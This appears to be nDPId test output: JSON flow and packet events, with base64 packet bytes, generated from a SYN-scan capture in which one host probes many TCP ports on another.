-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AADgGQ0OsEAAIQA2GNIzTgAHdU4MZAAAAAGACBAC0igAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHEAADUGawGsEAAIQA2GNIzTAsfdU4MZAAAAAGACCAAtxQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsdBIAADgGnGCsEAAIQA2GNIzTB\/ndU4MZAAAAAGACBAAskwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsSU4AADMGzCSsEAAIQA2GNIzTBErdU4MZAAAAAGACEAAkQgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE4AADMGDSWsEAAIQA2GNIzTDd\/dU4MZAAAAAGACEAAarQAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf4AACgG+nSsEAAIQA2GNIzTG3HdU4MZAAAAAGACBAAZGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsinkAAC8GjvmsEAAIQA2GNIzTFajdU4MZAAAAAGACEAAS5AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrkAADEGWLmsEAAIQA2GNIzTaXjdU4MZAAAAAGACCADHEwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1124,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1308,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsP2QAADMG1g6sEAAIQA2GNIzTBGTdU4MZAAAAAGACEAAkKAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1309,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/5IAAC0GG+CsEAAIQA2GNIzTDtjdU4MZAAAAAGACCAAhtAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1972,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1310,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs3zQAADIGNz6sEAAIQA2GNIzTB7TdU4MZAAAAAGACDAAk2AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAs75sAADEGJ9esEAAIQA2GNIzTBCXdU4MZAAAAAGACCAAsZwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsr2oAADsGXgisEAAIQA2GNIzTAGrdU4MZAAAAAGACEAAoIgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmoAACcGcwisEAAIQA2GNIzTBBXdU4MZAAAAAGACEAAkdwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1314,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsTr8AACYG07OsEAAIQA2GNIzTBIvdU4MZAAAAAGACDAAoAQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6UAAADcGKDKsEAAIQA2GNIzTCirdU4MZAAAAAGACEAAeYgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1316,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4BwAAC0GO1asEAAIQA2GNIzTBd3dU4MZAAAAAGACCAAqrwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1317,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsWGcAACoGxgusEAAIQA2GNIzSlZTdUoMYAAAAAGACDACW+gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAshTcAADYGjTusEAAIQA2GNIzSAaDdUoMYAAAAAGACDAAq7wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsW+wAADIGuoasEAAIQA2GNIzSB87dUoMYAAAAAGACDAAkwQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1330,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs4OUAADYGMY2sEAAIQA2GNIzSABTdUoMYAAAAAGACDAAsewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1331,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1321,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsLA4AAC8G7WSsEAAIQA2GNIzSBQfdUoMYAAAAAGACEAAjiAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1332,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oAAADEGLPKsEAAIQA2GNIzS387dUoMYAAAAAGACCABQwAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1333,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1323,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsfdcAACkGoZusEAAIQA2GNIzSAh3dUoMYAAAAAGACCAAucgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060491,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1334,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1324,"flow_packet_id":1,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060491,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlkAADIG2BmsEAAIQA2GNIzSBUjdUoMYAAAAAGACDAAnRwAAAgQFtA=="} 